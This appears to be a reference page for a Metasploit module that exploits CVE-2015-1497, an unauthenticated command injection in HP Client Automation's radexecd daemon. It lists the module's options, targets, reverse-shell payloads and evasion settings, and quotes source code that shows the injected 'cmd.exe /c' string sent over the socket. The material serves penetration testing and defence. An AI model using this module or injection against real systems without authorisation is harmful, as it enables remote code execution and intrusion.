HP Client Automation Command Injection - Metasploit


This page contains detailed information about how to use the exploit/multi/misc/persistent_hpca_radexec_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: HP Client Automation Command Injection
Module: exploit/multi/misc/persistent_hpca_radexec_exec
Source code: modules/exploits/multi/misc/persistent_hpca_radexec_exec.rb
Disclosure date: 2014-01-02
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): Unix, Windows
Target service / protocol: -
Target network port(s): 3465
List of CVEs: CVE-2015-1497

This module exploits a command injection vulnerability on HP Client Automation, distributed actually as Persistent Systems Client Automation. The vulnerability exists in the Notify Daemon (radexecd.exe), which doesn't authenticate execution requests by default. This module has been tested successfully on HP Client Automation 9.00 on Windows 2003 SP2 and CentOS 5.

Module Ranking and Traits


Module Ranking:

  • great: The exploit has a default target AND either auto-detects the appropriate target or uses an application-specific return address AFTER a version check. More information about ranking can be found here.

Basic Usage


msf > use exploit/multi/misc/persistent_hpca_radexec_exec
msf exploit(persistent_hpca_radexec_exec) > exploit

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Go back to menu.

Msfconsole Usage


Here is how the multi/misc/persistent_hpca_radexec_exec exploit module looks in the msfconsole:

msf6 > use exploit/multi/misc/persistent_hpca_radexec_exec

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show info

       Name: HP Client Automation Command Injection
     Module: exploit/multi/misc/persistent_hpca_radexec_exec
   Platform: Unix, Windows
       Arch: 
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great
  Disclosed: 2014-01-02

Provided by:
  Ben Turner
  juan vazquez <[email protected]>

Available targets:
  Id  Name
  --  ----
  0   HP Client Automation 9.0.0 / Linux
  1   HP Client Automation 9.0.0 / Windows

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT    3465             yes       The target port (TCP)
  SSL      false            no        Negotiate SSL for incoming connections
  SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                   no        The URI to use for this exploit (default is random)

Payload information:
  Space: 466
  Avoid: 1 characters

Description:
  This module exploits a command injection vulnerability on HP Client 
  Automation, distributed actually as Persistent Systems Client 
  Automation. The vulnerability exists in the Notify Daemon 
  (radexecd.exe), which doesn't authenticate execution requests by 
  default. This module has been tested successfully on HP Client 
  Automation 9.00 on Windows 2003 SP2 and CentOS 5.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2015-1497
  http://www.zerodayinitiative.com/advisories/ZDI-15-038
  https://radiasupport.accelerite.com/hc/en-us/articles/203659814-Accelerite-releases-solutions-and-best-practices-to-enhance-the-security-for-RBAC-and-Remote-Notify-features

Module Options


This is a complete list of options available in the multi/misc/persistent_hpca_radexec_exec exploit:

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show options

Module options (exploit/multi/misc/persistent_hpca_radexec_exec):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT    3465             yes       The target port (TCP)
   SSL      false            no        Negotiate SSL for incoming connections
   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH                   no        The URI to use for this exploit (default is random)

Exploit target:

   Id  Name
   --  ----
   0   HP Client Automation 9.0.0 / Linux

Advanced Options


Here is a complete list of advanced options supported by the multi/misc/persistent_hpca_radexec_exec exploit:

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show advanced

Module advanced options (exploit/multi/misc/persistent_hpca_radexec_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CMDSTAGER::SSL          false            no        Use SSL/TLS for supported stagers
   CMDSTAGER::TEMP                          no        Writable directory for staged files
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   ListenerComm                             no        The specific communication channel to use for this service
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSLCipher                                no        String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH"
   SSLCompression          false            no        Enable SSL/TLS-level compression
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   SendRobots              false            no        Return a robots.txt file if asked for one
   URIHOST                                  no        Host to use in URI (useful for tunnels)
   URIPORT                                  no        Port to use in URI (useful for tunnels)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                10               no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the multi/misc/persistent_hpca_radexec_exec module can exploit:

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   HP Client Automation 9.0.0 / Linux
   1   HP Client Automation 9.0.0 / Windows

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the multi/misc/persistent_hpca_radexec_exec exploit:

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show payloads

Compatible Payloads
===================

   #  Name                                        Disclosure Date  Rank    Check  Description
   -  ----                                        ---------------  ----    -----  -----------
   0  payload/cmd/unix/bind_awk                                    normal  No     Unix Command Shell, Bind TCP (via AWK)
   1  payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   2  payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   3  payload/cmd/unix/reverse_awk                                 normal  No     Unix Command Shell, Reverse TCP (via AWK)
   4  payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   5  payload/cmd/unix/reverse_openssl                             normal  No     Unix Command Shell, Double Reverse TCP SSL (openssl)
   6  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the multi/misc/persistent_hpca_radexec_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(multi/misc/persistent_hpca_radexec_exec) > show evasion

Module evasion options:

   Name                  Current Setting  Required  Description
   ----                  ---------------  --------  -----------
   HTTP::chunked         false            no        Enable chunking of HTTP responses via "Transfer-Encoding: chunked"
   HTTP::compression     none             no        Enable compression of HTTP responses via content encoding (Accepted: none, gzip, deflate)
   HTTP::header_folding  false            no        Enable folding of HTTP headers
   HTTP::junk_headers    false            no        Enable insertion of random junk HTTP headers
   HTTP::no_cache        false            no        Disallow the browser to cache HTTP content
   HTTP::server_name     Apache           yes       Configures the Server header of all outgoing replies
   TCP::max_send_size    0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay       0                no        Delays inserted before every send.  (0 = disable)

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Invalid target


Here is a relevant code snippet related to the "Invalid target" error message:

99:	      execute_cmdstager({:flavor => :vbs, :linemax => 290})
100:	    when 'unix'
101:	      print_status('Exploiting Linux target...')
102:	      exploit_unix
103:	    else
104:	      fail_with(Failure::NoTarget, 'Invalid target')
105:	    end
106:	  end
107:	
108:	  def exploit_unix
109:	    connect

Something failed executing the stager...


Here is a relevant code snippet related to the "Something failed executing the stager..." error message:

119:	    sock.put("\x00") # port
120:	    sock.put("S-1-5-18\x00") # user ID
121:	    sock.put("#{rand_text_alpha(4 + rand(3))}\x00") # password
122:	    sock.put("hide hide\"\x09\"cmd.exe /c #{cmd}&\"\x00") # command, here commands can be injected
123:	    res = sock.get_once
124:	    disconnect
125:	    unless res && res.unpack('C')[0] == 0
126:	      fail_with(Failure::Unknown, "Something failed executing the stager...")
127:	    end
128:	  end
129:	end

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Ben Turner
  • juan vazquez

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.